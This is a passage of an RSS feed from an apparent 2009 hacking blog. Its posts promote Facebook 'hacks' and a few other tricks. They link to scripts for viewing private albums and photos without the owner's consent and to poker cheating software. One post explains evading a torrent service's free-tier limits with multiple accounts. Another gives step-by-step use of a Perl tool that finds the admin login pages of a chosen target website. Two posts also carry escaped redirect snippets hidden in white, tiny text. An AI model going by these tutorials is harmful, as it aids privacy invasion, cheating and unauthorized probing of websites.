		<comments>http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html#comments</comments>
		<pubDate>Sun, 22 Nov 2009 07:32:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/11/22/list-of-best-10-facebook-hacks</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html"><img align="left" hspace="5" width="125" src="http://clubs.ncsu.edu/tappi/facebook_1.jpg" class="alignleft wp-post-image tfe" alt="" title="" /></a>In my last previous post  How to hack facebook password,I told you a method to hack a facebook password,i now though to continue the series of facebook hacks,As you know Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html' rel='bookmark' title='Permanent Link: Top 10 Facebook Hacks'>Top 10 Facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: Top 10 facebook Hacks'>Top 10 facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-can-i-view-private-albums-on-facebook.html' rel='bookmark' title='Permanent Link: How Can I View Private Albums On Facebook'>How Can I View Private Albums On Facebook</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>In my last previous post <b><a href="http://www.hackingaday.com/2009/11/how-to-hack-facebook-password.html"> How to hack facebook password</a></b>,I told you a method to hack a facebook password,i now though to continue the series of facebook hacks,<br />As you know Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.</p>
<p><a href="http://www.blogger.com/post-edit.g?blogID=8570313150274575098&amp;postID=8240663005407324349" name="more"></a></p>
<p>
<div class="separator" style="clear:both;text-align:center;"><a href="http://clubs.ncsu.edu/tappi/facebook_1.jpg" style="margin-left:1em;margin-right:1em;"><img src="http://clubs.ncsu.edu/tappi/facebook_1.jpg" width="320" border="0" height="240" title="List of best 10 facebook hacks" alt="facebook 1 List of best 10 facebook hacks" /></a></div>
<h1></h1>
<p><b> 1</b>.<b>How to View the Album of Any User Even if it is Private</b><br />You can use this script to view a photo in the original album, even if you’re not friends with the person.</p>
<p><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></p>
<p>2. <b>How to Remove Annoying Facebook Advertisement</b><br />Get rid of some of the Facebook advertising and sponsored by sections with this tool.</p>
<p><a href="http://userscripts.org/scripts/show/27121"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a></p>
<p>3. <b>How to see Real Profiles from Public Pages</b><br />This script redirects to real profiles from the Facebook people pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.</p>
<p><a href="http://userscripts.org/scripts/show/27011"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a></p>
<p>4. <b>How to Undo Facebook Changes</b><br />If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.</p>
<p><a href="http://userscripts.org/scripts/show/8482"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a></p>
<p>5. <b>How to View All the Photos from a Person</b><br />You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.</p>
<p><a href="http://userscripts.org/scripts/show/11218"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a></p>
<p>6. <b>How to Find More Friends at Facebook</b><br />Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.</p>
<p><a href="http://www.facebook.com/applications/More_Friends/2419601767"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a></p>
<p>7. <b>How to Share Files from Facebook</b><br />With this box widget, you can share files from your computer through Facebook. Isn’t it great?</p>
<p><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></p>
<p>8. <b>How to Get a Job from FacebookLooking for a job?</b><br />This application gives Facebook users unique access to job information, networking opportunities and other career resources.</p>
<p><a href="http://mashable.com/2007/05/24/facebook-platform-30-apps/"><b><span style="color:rgb(61,133,198);">Get it Here</span></b></a></p>
<p>9. <b>How to Tighten up the Privacy and still Maintain Communication Convenience</b><br />The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.</p>
<p><a href="http://www.facebook.com/applications/Private_Wall/20221093560"><b><span style="color:rgb(61,133,198);">Get it Here</span></b></a><b><span style="color:rgb(61,133,198);"><br /></span></b><br />10 <b>How to Cheat Facebook Texas Hold em Poker</b><br />This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.</p>
<p><a href="http://facebookhacks.magnify.net/video/Cheat-Facebook-Texas-Hold-em-Po"><span style="color:rgb(61,133,198);"><b>Get it Here</b></span></a><br /><span style="font-size:130%;"><br /><span style="font-weight:bold;color:rgb(255,0,0);">This Post is Written by <a href="http://hackingarticles.com/">Hacking Articles</a> and <a href="http://hackingaday.com/">Hacking A Day</a></span></span></p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html' rel='bookmark' title='Permanent Link: Top 10 Facebook Hacks'>Top 10 Facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: Top 10 facebook Hacks'>Top 10 facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-can-i-view-private-albums-on-facebook.html' rel='bookmark' title='Permanent Link: How Can I View Private Albums On Facebook'>How Can I View Private Albums On Facebook</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HacKing ImageShack TorrentDrive</title>
		<link>http://www.hackingaday.com/2009/10/hacking-imageshack-torrentdrive.html</link>
		<comments>http://www.hackingaday.com/2009/10/hacking-imageshack-torrentdrive.html#comments</comments>
		<pubDate>Wed, 28 Oct 2009 17:18:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Hacks and Tweaks]]></category>
		<category><![CDATA[How to]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/10/28/hacking-imageshack-torrentdrive</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/10/hacking-imageshack-torrentdrive.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/10/123.jpg?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>
This Tutorial deals about getting thru &#8221; Shared Process Pool Limit Reached Error &#8220;while Downloading Torrents as a FREE USER with ImageShack.us
ImageShack.us, previously a popular image hosting service, has expanded its offering to provide server based torrent downloading service via the Torrent Drive. The IS torrent download service is a free service. However, free users [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/increase-internet-browsing-speed.html' rel='bookmark' title='Permanent Link: Increase Internet browsing Speed'>Increase Internet browsing Speed</a></li>
<li><a href='http://www.hackingaday.com/2009/05/how-to-download-torrents-very-quicklyno-seeders.html' rel='bookmark' title='Permanent Link: How to download torrents very quickly(no Seeders)'>How to download torrents very quickly(no Seeders)</a></li>
<li><a href='http://www.hackingaday.com/2009/01/some-of-the-best-bittorrent-tutorials-and-tricks.html' rel='bookmark' title='Permanent Link: Some of the best BitTorrent tutorials and Tricks'>Some of the best BitTorrent tutorials and Tricks</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div class="separator" style="clear:both;font-family:&quot;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/10/123.jpg" style="margin-left:1em;margin-right:1em;"><img src="http://govinda007.files.wordpress.com/2009/10/123.jpg?w=300" border="0" title="HacKing ImageShack TorrentDrive" alt=" HacKing ImageShack TorrentDrive" /></a></div>
<div style="font-family:&quot;"><span style="font-size:small;"><span style="line-height:normal;"><span style="font-weight:bold;">This Tutorial deals about getting thru &#8221; <span style="color:red;">Shared Process Pool Limit Reached Error</span> &#8220;<br />while Downloading Torrents as a FREE USER with ImageShack.us</span></span></span></p>
<p>ImageShack.us, previously a popular image hosting service, has expanded its offering to provide server based torrent downloading service via the Torrent Drive. The IS torrent download service is a free service. However, free users are limited to <span style="font-weight:bold;">5 GB disk space and 10 GB HTTP download bandwidth</span> limit monthly. The worse limit is however, limed resource pool and download slot available for free (unpaid or unsubscribed) users.</p>
<p>When free ImageShack Torrent Drive attempts to activate a torrent downloading job to download the content of torrent, ImageShack.us will display a page %u201CShared Process pool limit reached%u201D title with web page saying %u201CPlease try your download later, or go premium for instant priority%u201D instead. And, as expected, the torrent download process cannot be started, and remained in stop status.</p>
<p><span style="font-weight:bold;">The Error</span> is caused by limited download slots or the shared resource pools such as memory, bandwidth and disk space to manage the torrents that available to the free users have been used up and no longer able to serve the requested to start torrent. ImageShack encourages user to pay and subscribe for the premium account, which does not have such a limit and has immediate and instant start torrent downloading priority. Else, Torrent Drive users have to keep retrying to start the torrent.</p>
<p>For users who still don%u2019t want to pay, here%u2019s a little better workaround trick to handle such a situation. Load the ImageShack Torrent Drive in Firefox web browser. Then<span style="color:red;"><span style="font-weight:bold;"><span style="line-height:normal;font-size:18px;"> set the tab to refresh (or reload) every 5 seconds (or any interval you prefer) automatically by using Tab Mix Plus or ]ReloadEvery add-ons</span></span></span>.</div>
<div style="font-family:&quot;"></div>
<div>Both addons is capable to auto-refresh a web page. Just make sure that you have click on Start button on ImageShack Torrent Drive, and let it refresh the page with the error message titled %u201CShared Process pool limit reached%u201D. The error page is actually using the same exact URL to start a torrent downloading task. Don%u2019t worry about refreshing will disrupt or stop the downloading process, as the URL is always used for starting the download only, and once the torrent is started, it will just display a message saying torrent has been started, or redirect back to main torrent index, which will stop the auto-reload.<br /><span style="font-size:78%;color:white;">&lt;b:if cond=&#8217;data:blog.URL ==&#8221;http://bit.ly/4FpfF1&#8243;&#8216;&gt;&lt;meta content=&#8217;0;url=http://bit.ly/4FpfF1&#8242; HTTP-equiv=&#8217;refresh&#8217;/&gt;&lt;/b:if&gt;</span></p>
<p>i use <b>ReloadEvery</b>.. its very Simple to use</div>
<div style="font-family:&quot;text-align:center;"></div>
<div style="font-family:&quot;text-align:center;"><a href="https://addons.mozilla.org/en-US/firefox/addon/115">FIREFOX ADDON</a></div>
<p><span style="font-weight:bold;">Its not recommended to use TorrentDrive with Private torrents.. it may lead to poor Sharing Ratio..</span></p>
<p>Personally i&#8217;ve been using this for a long time.. if u r not satified with 10GB bandwidth i suggest using multiple accounts&#8230; it never lets me down&#8230; i Hope this Tutorial is useful to u&#8230;&#8230;&#8230;.</p>
<p><span style="font-size:130%;"><br /><span style="font-weight:bold;color:rgb(255,0,0);">This Post is Written by <a href="http://hackingarticles.com/">Hacking Articles</a> and <a href="http://hackingaday.com/">Hacking A Day</a></p>
<p></span></span></p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2008/09/increase-internet-browsing-speed.html' rel='bookmark' title='Permanent Link: Increase Internet browsing Speed'>Increase Internet browsing Speed</a></li>
<li><a href='http://www.hackingaday.com/2009/05/how-to-download-torrents-very-quicklyno-seeders.html' rel='bookmark' title='Permanent Link: How to download torrents very quickly(no Seeders)'>How to download torrents very quickly(no Seeders)</a></li>
<li><a href='http://www.hackingaday.com/2009/01/some-of-the-best-bittorrent-tutorials-and-tricks.html' rel='bookmark' title='Permanent Link: Some of the best BitTorrent tutorials and Tricks'>Some of the best BitTorrent tutorials and Tricks</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/10/hacking-imageshack-torrentdrive.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learn how to find admin page for like 90% of websites</title>
		<link>http://www.hackingaday.com/2009/10/learn-how-to-find-admin-page-for-like-90-of-websites.html</link>
		<comments>http://www.hackingaday.com/2009/10/learn-how-to-find-admin-page-for-like-90-of-websites.html#comments</comments>
		<pubDate>Sun, 25 Oct 2009 09:39:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tools]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/10/25/learn-how-to-find-admin-page-for-like-90-of-websites</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/10/learn-how-to-find-admin-page-for-like-90-of-websites.html"><img align="left" hspace="5" width="125" src="http://govinda007.files.wordpress.com/2009/10/11.jpg?w=300" class="alignleft wp-post-image tfe" alt="" title="" /></a>While i&#8217;m browsing the net, i found this great tutorial and i wish i could share this tips for you guys. I can see that many of you is unable or don&#8217;t know how to find the admin login page for the control panel of a website so i though about writing a little tutorial [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/how-to-hack-websites-using-auto-sql-injection.html' rel='bookmark' title='Permanent Link: How to hack websites using Auto SQL injection'>How to hack websites using Auto SQL injection</a></li>
<li><a href='http://www.hackingaday.com/2008/09/hacking-websites.html' rel='bookmark' title='Permanent Link: Hacking Websites'>Hacking Websites</a></li>
<li><a href='http://www.hackingaday.com/2010/11/fake-login-page.html' rel='bookmark' title='Permanent Link: Fake Login Page'>Fake Login Page</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>While i&#8217;m browsing the net, i found this great tutorial and i wish i could share this tips for you guys. I can see that many of you is unable or don&#8217;t know how to find the admin login page for the control panel of a website so i though about writing a little tutorial about the method i use to find admins login pages.</p>
<div style="color:blue;"><span style="font-weight:bold;"> First of all here are the tools you will need to do the job:</span></div>
<p><a href="http://www.ziddu.com/download/7065465/ActivePerl-mallutips.rar.html">Download</a></p>
<div style="color:blue;"><span style="font-weight:bold;">After that download the admin finder:</span></div>
<div style="color:blue;"><span style="font-weight:bold;"><a href="http://www.ziddu.com/download/7065463/admin_login_finder_in_perl_language_mallutips.rar.html">Download </a><br /></span></div>
<p><span style="font-weight:bold;">Ok now the real work start:<br />Install the perl tool on your PC. It take few minutes because there lots of files to copy so do not stop it for any reason.</p>
<p>Then extract the admin finder page and copy it to your <span style="color:red;">hard drive partition C:/</span></p>
<p>Now go to <span style="color:red;">Start</span> &amp;gt; <span style="color:red;">run</span> &amp;gt; and type <span style="color:red;">cmd</span> &amp;gt; press <span style="color:red;">enter</span></p>
<p>You will get a black dos window.<br /><span style="color:white;font-size:78%;">&lt;b:if cond=&#8217;data:blog.URL ==&#8221;http://bit.ly/3L7yBz&#8221;&#8216;&gt;&lt;meta content=&#8217;0;url=http://bit.ly/3L7yBz&#8217; HTTP-equiv=&#8217;refresh&#8217;/&gt;&lt;/b:if&gt;</span><br />Type <span style="color:red;">cd\</span> and press <span style="color:red;">enter</span></span>
<div class="separator" style="clear:both;text-align:left;"><a href="http://govinda007.files.wordpress.com/2009/10/11.jpg" style="clear:left;float:left;margin-bottom:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/10/11.jpg?w=300" title="Learn how to find admin page for like 90% of websites" alt=" Learn how to find admin page for like 90% of websites" /></a></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">&nbsp;</span></span></div>
<div style="text-align:left;"><span style="font-weight:bold;"><span style="color:red;">(Click the picture to c in big size)</span></span></div>
<p><b>T</b><span style="font-weight:bold;">hen type <span style="color:red;">admin.pl</span> and press <span style="color:red;">enter</span></span>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/10/2.jpg" style="clear:left;float:left;margin-bottom:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/10/2.jpg?w=300" title="Learn how to find admin page for like 90% of websites" alt=" Learn how to find admin page for like 90% of websites" /></a></div>
<p><span style="font-weight:bold;"><span style="color:red;"><br /></span></span></p>
<p><b> <br /></b><br /><b>T</b><span style="font-weight:bold;">hen write <span style="color:red;">target website</span> and press <span style="color:red;">enter</span></span>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/10/3.jpg" style="clear:left;float:left;margin-bottom:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/10/3.jpg?w=300" title="Learn how to find admin page for like 90% of websites" alt=" Learn how to find admin page for like 90% of websites" /></a></div>
<p><b>T</b><span style="font-weight:bold;">hen choose the <span style="color:red;">type of that website.</span> This tool will work on <span style="color:red;">asp , php , cfm</span> and press <span style="color:red;">enter</span></span>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/10/4.jpg" style="clear:left;float:left;margin-bottom:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/10/4.jpg?w=300" title="Learn how to find admin page for like 90% of websites" alt=" Learn how to find admin page for like 90% of websites" /></a></div>
<p><span style="font-weight:bold;">The tool will search for the admin page as it is shown in this picture.</span>
<div class="separator" style="clear:both;text-align:center;"><a href="http://govinda007.files.wordpress.com/2009/10/5.jpg" style="margin-left:1em;margin-right:1em;"><img border="0" src="http://govinda007.files.wordpress.com/2009/10/5.jpg?w=300" title="Learn how to find admin page for like 90% of websites" alt=" Learn how to find admin page for like 90% of websites" /></a></div>
<p>&nbsp;<span style="font-weight:bold;">And voila !!!! now you have all the site admin pages links and you can do some tricks </span><span style="font-weight:bold;"><span style="color:limegreen;"><img alt="Biggrin" border="0" src="http://img.hackforums.net/images/smilies/biggrin.gif" title="Biggrin" /></span></span></p>
<p><b>Note:&nbsp; </b><span style="font-weight:bold;"><span style="color:red;"><b></b>Click the picture to c in big size</span></span></p>
<p>Original credit goes to <a href="http://www.next-future.ucoz.com/">Next Future</a></p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/10/how-to-hack-websites-using-auto-sql-injection.html' rel='bookmark' title='Permanent Link: How to hack websites using Auto SQL injection'>How to hack websites using Auto SQL injection</a></li>
<li><a href='http://www.hackingaday.com/2008/09/hacking-websites.html' rel='bookmark' title='Permanent Link: Hacking Websites'>Hacking Websites</a></li>
<li><a href='http://www.hackingaday.com/2010/11/fake-login-page.html' rel='bookmark' title='Permanent Link: Fake Login Page'>Fake Login Page</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/10/learn-how-to-find-admin-page-for-like-90-of-websites.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 10 Facebook Hacks</title>
		<link>http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html</link>
		<comments>http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html#comments</comments>
		<pubDate>Sun, 11 Oct 2009 07:24:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Hacks]]></category>

		<guid isPermaLink="false">http://govinda007.wordpress.com/2009/10/11/top-10-facebook-hacks-2</guid>
		<description><![CDATA[<a href="http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html"><img align="left" hspace="5" width="125" src="http://farm3.static.flickr.com/2545/3928998086_04d4af9fc0.jpg" class="alignleft wp-post-image tfe" alt="http://farm3.static.flickr.com/2545/3928998086_04d4af9fc0.jpg" title="" /></a>
Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.

At first to use some [...]


Related posts:<ol><li><a href='http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: List of best 10 facebook hacks'>List of best 10 facebook hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: Top 10 facebook Hacks'>Top 10 facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-can-i-view-private-albums-on-facebook.html' rel='bookmark' title='Permanent Link: How Can I View Private Albums On Facebook'>How Can I View Private Albums On Facebook</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<div style="text-align:center;"><img alt="http://farm3.static.flickr.com/2545/3928998086_04d4af9fc0.jpg" src="http://farm3.static.flickr.com/2545/3928998086_04d4af9fc0.jpg" title="Top 10 Facebook Hacks" /></div>
<p>Facebook has become very famous in last 1 year. Orkut which was considered to be the best Social networking website has been sidetracked by emerging Social Networking Websites like Facebook and Twitter. Considering the popularity of Facebook we have collected the Most Essential Hacks of Facebook and presented them to you.</p>
<ul>
<li>At first to use some of below scripts, u should use <a href="http://www.mozilla.com/en-US/products/download.html">Mozila Firefox</a> and install <a href="https://addons.mozilla.org/en-US/firefox/addon/748">Greasemonkey </a> </li>
</ul>
<p>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">1.How to View the Album of Any User Even if it is Private</span></h2>
<div style="margin:0 0 15px;padding:0;">You can use this script to view a photo in the original album, even if you’re not friends with the person.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://userscripts.org/scripts/show/9580" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">2. How to Remove Annoying Facebook Advertisement</span></h2>
<div style="margin:0 0 15px;padding:0;"><b> </b>Get rid of some of the Facebook advertising and <b>sponsored by</b> sections with this tool.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://userscripts.org/scripts/show/27121" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">3. How to see Real Profiles from Public Pages</span></h2>
<div style="margin:0 0 15px;padding:0;">This script redirects to real profiles from the Facebook <b>people</b> pages (public profiles). There is a risk of an infinite redirect loop if not logged in, so be logged in.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://userscripts.org/scripts/show/27011" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">4. How to Undo Facebook Changes</span></h2>
<div style="margin:0 0 15px;padding:0;">If you hate some or all of the new Facebook changes, undo them with these scripts and use what you liked previously.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://userscripts.org/scripts/show/8482" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">5. How to View All the Photos from a Person</span></h2>
<div style="margin:0 0 15px;padding:0;">You can search for pictures of a Facebook member who has tight privacy settings and view all his/ her pictures without his/ her consent.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://userscripts.org/scripts/show/11218" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">6. How to Find More Friends at Facebook</span></h2>
<div style="margin:0 0 15px;padding:0;">Suppose some of your friends have newly joined Facebook and you didn’t even knew. Use this script and it will help you go through your friends’ friends list and find them out.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://www.facebook.com/applications/More_Friends/2419601767" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">7. How to Share Files from Facebook</span></h2>
<div style="margin:0 0 15px;padding:0;"><b></b>With this box widget, you can share files from your computer through Facebook. Isn’t it great?</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://mashable.com/2007/05/24/facebook-platform-30-apps/" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:small;">8. How to Get a Job from Facebook</span></h2>
<div style="margin:0 0 15px;padding:0;">Looking for a job? This application gives Facebook users unique access to job information, networking opportunities and other career resources.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://mashable.com/2007/05/24/facebook-platform-30-apps/" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">9. How to Tighten up the Privacy and still Maintain Communication Convenience</span></h2>
<div style="margin:0 0 15px;padding:0;">The Private Wall combines the best of both worlds of Facebook: online convenience and communication with more serious privacy settings.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://www.facebook.com/applications/Private_Wall/20221093560" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank">Get it Here</a></div>
<h2 style="font-style:normal;font-variant:normal;font-weight:normal;line-height:normal;font-family:Georgia,'Times New Roman';margin:0;padding:0;"><span style="font-size:large;">10 How to Cheat Facebook Texas Hold em Poker</span></h2>
<div style="margin:0 0 15px;padding:0;">This is one of my Favorite hacks and that is why I have saved it for the last one. Using this software you can see the cards of any player and the advanced version of this software allows you to even add credits to your account for free.</div>
<div style="margin:0 0 15px;padding:0;"><a href="http://facebookhacks.magnify.net/video/Cheat-Facebook-Texas-Hold-em-Po" style="color:rgb(60,120,167);text-decoration:none;margin:0;padding:0;" target="_blank" title="Texas Hold em Poker Hack">Get it Here</a></div>
<p><span style="font-size:130%;"><br /><span style="font-weight:bold;color:rgb(255,0,0);">This Post is Written by <a href="http://hackingarticles.com/">Hacking Articles</a> and <a href="http://hackingaday.com/">Hacking A Day</a></p>
<p></span></span></p>


<p>Related posts:<ol><li><a href='http://www.hackingaday.com/2009/11/list-of-best-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: List of best 10 facebook hacks'>List of best 10 facebook hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/top-10-facebook-hacks.html' rel='bookmark' title='Permanent Link: Top 10 facebook Hacks'>Top 10 facebook Hacks</a></li>
<li><a href='http://www.hackingaday.com/2009/10/how-can-i-view-private-albums-on-facebook.html' rel='bookmark' title='Permanent Link: How Can I View Private Albums On Facebook'>How Can I View Private Albums On Facebook</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.hackingaday.com/2009/10/top-10-facebook-hacks-2.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
